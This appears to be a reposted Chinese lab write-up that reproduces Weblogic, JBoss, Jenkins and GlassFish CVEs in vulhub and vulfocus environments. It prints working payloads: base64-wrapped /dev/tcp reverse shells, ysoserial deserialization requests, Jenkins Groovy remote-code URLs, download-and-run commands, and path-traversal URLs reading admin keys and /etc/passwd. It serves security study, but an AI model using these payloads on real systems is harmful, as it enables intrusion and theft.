中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

这篇具有很好参考价值的文章主要介绍了中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等
1、中间件-Weblogic安全
2、中间件-JBoos安全
3、中间件-Jenkins安全
4、中间件-GlassFish安全

常见中间件的安全测试:
1、配置不当-解析&弱口令
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
4、安全应用-框架特定安全漏洞

中间件安全测试流程:
1、判断中间件信息-名称&版本&三方
2、判断中间件问题-配置不当&公开漏洞
3、判断中间件利用-弱口令&EXP&框架漏洞

应用服务安全测试流程:
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

中间件-Weblogic安全问题

详解:weblogic详解

介绍:
Java应用服务器软件
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器

安全问题:

CVE_2017_3506
CVE_2018_2893
CVE_2018_3245
CVE-2018-2628 反序列化
CVE_2020_14882
CVE_2021_2394 反序列化
CVE-2023-21839 反序列化

以上的漏洞基本都可以使用现成熟的工具进行直接攻击利用。

漏洞复现

以CVE_2017_3506为例(其他编号漏洞利用基本类似,直接上工具,点一点~):

CVE_2017_3506漏洞复现

靶场:vulfocus
开启环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
访问:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
直接将url信息放入到工具当中进行检测:
存在漏洞,可直接进行命令执行:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或者上传,注入等操作。

手工操作复现:weblogic反序列漏洞复现

中间件-JBoos安全问题

详解:Jboss详解

介绍:
J2EE的开放源代码的应用服务器
是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这 几个,Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

安全问题:

CVE-2017-12149
CVE-2017-7504
弱口令 未授权访问

漏洞复现

CVE-2017-12149漏洞复现

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

靶场:vulhub
参考:JBoss 5.x/6.x 反序列化漏洞
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

开启环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

访问:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
漏洞利用:

payload:
//反弹shell命令:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//ysoserial工具利用:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//curl命令进行请求访问,发送:
curl http://192.168.100.134:8080/invoker/readonly --data-binary @poc.ser
//接收端开启监听
nc -lvvp 8888

在ysoserial工具目录下生成了poc.ser文件:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

发送curl请求:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

监听端成功接收,反弹shell成功:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

CVE-2017-7504漏洞复现

介绍:
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

靶场:vulhub
参考:JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

开启环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

访问:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
漏洞利用:

//此漏洞和CVE-2017-12149利用方式差不多,区别就是请求地址内容不同
payload:
//反弹shell命令:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//ysoserial工具利用:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//进行curl请求:
curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
//接收端开启监听:
nc -lvvp 8888

发送curl请求:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

监听端成功接收,反弹shell成功:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

中间件-Jenkins安全问题

详解:Jenkins详解
介绍:

开源软件项目
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
探针默认端口:8080

安全问题:

CVE-2017-1000353

CVE-2018-1000861

漏洞复现

CVE-2017-1000353漏洞复现

靶场:vulfocus
或vulhub
参考:Jenkins-CI 远程代码执行漏洞
vulhub环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

vulfocus环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
开启靶场:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

访问:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

漏洞利用:
工具地址:CVE-2017-1000353
JDK版本需要为jdk-8u291,其他版本可能失效,无法复现成功
下载地址:JDK8

payload:
//执行命令,创建文件
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /123.txt"
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//然后回到我们的靶机中打开终端输入以下命令,查看验证是否利用成功
docker ps -a
docker exec -it 838723a23ad0 /bin/bash
ls /

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

反弹shell命令:

sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

//反弹shell操作:
//将刚刚执行创建文件的命令,换成该反弹shell命令即可(base64加密后的)
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//接收端开启监听
nc -lvvp 8888

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
注意JDK版本,否则可能无法复现。

CVE-2018-1000861漏洞复现

靶场:vulhub
参考:Jenkins远程命令执行漏洞
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
开启环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

访问:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

漏洞利用:
exp下载地址:CVE-2018-1000861EXP

//使用exp脚本可直接利用,python2下使用
payload:
python2 exp.py 

python2 exp.py http://192.168.100.134:8080/ "touch /tmp/123.txt"
python2 exp.py http://192.168.100.134:8080/ "touch /tmp/test.txt"

//进入靶场环境进行验证:
docker ps
docker exec -it 靶场id /bin/bash
ls /tmp/

使用说明:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

使用方式:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

验证是否成功:
成功创建文件
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

还可以进行手工测试:

手工检测:
poc:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}
payload:
创建文件:
//发送以下请求:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

验证:
成功创建
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

反弹shell:

payload:
//反弹shell命令进行base64加密
python2 exp.py http://192.168.100.134:8080  "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//接收端开启监听
nc -lvvp 8888

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

成功反弹shell:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

ps:如果不能反弹,可在服务端创建文本文件,将反弹shell命令写进文本文件当中。然后python开启http服务,观察状态。

//开启http服务:
python -m http.server 8080

//python2执行exp脚本,将远程文件保存至目标主机
python2 exp.py 目标主机 "curl -o /tmp/cmd.sh  http://xxxx:8080/cmd.txt"

//python2执行exp脚本,使目标主机运行脚本文件反弹shel
python2 exp.py 目标主机 "bash /tmp/cmd.sh"

中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

http服务端可观察状态:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

进入靶场验证,存在该文件:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全
接下来使用python2脚本exp命令进行执行即可。

还可以手工浏览器访问,依次执行:

payload:
//这里拿本地演示
//将文件保存到目标主机:
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://VPSip:8080/cmd.txt".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt".execute()}}

//执行shell脚本
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}

访问时,浏览器变为空白界面:
执行成功
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

中间件-Glassfish安全问题

介绍:
GlassFish详解

一款商业应用服务器
GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。

安全问题:

CVE-2017-1000028

漏洞复现

CVE-2017-1000028漏洞复现

漏洞原理:

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

靶场:vulhub
参考:GlassFish 任意文件读取漏洞
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

开启环境:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

进入环境,访问:
环境运行后,访问http://your-ip:8080http://your-ip:4848即可查看web页面。其中,8080端口是网站内容,4848端口是GlassFish管理中心。
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

payload:
//读取密码:
https://192.168.100.134:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile

//linux下读取文件:
https://192.168.100.134:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

//window下读取文件:
http://you-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

成功读取密码:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全

成功读取文件:
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现,Web安全,漏洞复现,中间件,jenkins,web安全,网络安全文章来源地址https://www.toymoban.com/news/detail-719889.html

到了这里,关于中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 第59天-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    文章仅供学习交流,一些价值不高的漏洞没复现,日后来兴趣再补坑(大概~) 文章略长,阅读需耐心~ 视频链接:  【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目录 一.知识点 二.章节内容 1、常见中间件的安全测试 2、

    2024年02月20日
    浏览(58)
  • 小迪安全 第59天 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    IIS现在用的也少了,漏洞也基本没啥用  没有和权限挂钩 windows 2003上面的漏洞 配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。 这个跟文件上传类似,找到文件上传点,上传png图片 找到上传路径和nginx版本号 查看路径 添加后缀可以用php执行png

    2024年02月04日
    浏览(98)
  • Day79:服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    目录 中间件-IIS-短文件文件解析蓝屏写权限 HTTP.SYS(CVE-2015-1635)主要用作蓝屏破坏,跟权限不挂钩 IIS短文件(iis全版本都可能有这个问题) IIS文件解析 IIS写权限 中间件-Nginx-文件解析目录穿越漏洞CRLF CVE-2013-4547 文件上传 解析漏洞(配置不当) 目录穿越(配置不当) CRLF注入(配置

    2024年04月08日
    浏览(53)
  • tomcat中间件漏洞复现

    Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性

    2024年02月10日
    浏览(49)
  • 【精选】中间件 tomcat漏洞复现

    目录 1、tomcat后台弱口令漏洞利用 利用冰蝎连接: 2、tomcat远程代码执行漏洞 利用冰蝎子连接: 利用冰蝎连接: 靶场: 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子连接:

    2024年01月21日
    浏览(51)
  • 中间件漏洞(一)CVE-2013-4547(文件名逻辑漏洞)

    目录 1. 了解nginx的工作原理 2. 漏洞原理及举例分析 3. 前端php源码分析 4. 注入思路 5. 漏洞复现 5.1 上传文件并抓包分析  5.2 通过访问文件执行php  注意一点 6. 漏洞修复 nginx是以PHP语言为主。像Apache一样,Nginx自身是不支持解析PHP语言的,只能通过加载PHP模块来解析PHP。原理图

    2024年02月02日
    浏览(80)
  • 平台安全之中间件安全

    理解中间件 一次web访问的顺序,web浏览器-web服务器(狭义)-web容器-应用服务器-数据库服务器 web服务器 广义:提供广义web服务的软件或主机 狭义:提供w3服务的软件或主机,即Web服务器软件或装有Web服务器软件的计算机。例如:IIS、Apache、nginx、Lighttpd。Web服务器可以处理

    2024年02月13日
    浏览(50)
  • 中间件安全

    vulhub漏洞复现:https://vulhub.org/ 操作教程:https://www.freebuf.com/sectool/226207.html 一、Apache Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 Apache是用

    2024年02月21日
    浏览(39)
  • 中间件安全—Nginx常见漏洞

      在上篇中间件安全—Apache常见漏洞中,并未对中间件漏洞进行解释,这里补充一下。   所谓的中间件漏洞就是并非是由于代码程序上设计存在缺陷而导致的漏洞,而是属于应用部署中环境配置不当或使用不当而导致的漏洞,同时这方面的漏洞也是最容易被管理员忽略的

    2024年02月09日
    浏览(44)
  • 中间件安全—Tomcat常见漏洞

      整个复现环境均使用Vulhub一键搭建漏洞测试靶场,Vulhub靶场:链接 1.2.1.漏洞原理   Tomcat配置文件/conf/web.xml 配置了可写(readonly=false),导致可以使用PUT方法上传任意文件,攻击者将精心构造的payload向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被

    2024年02月08日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包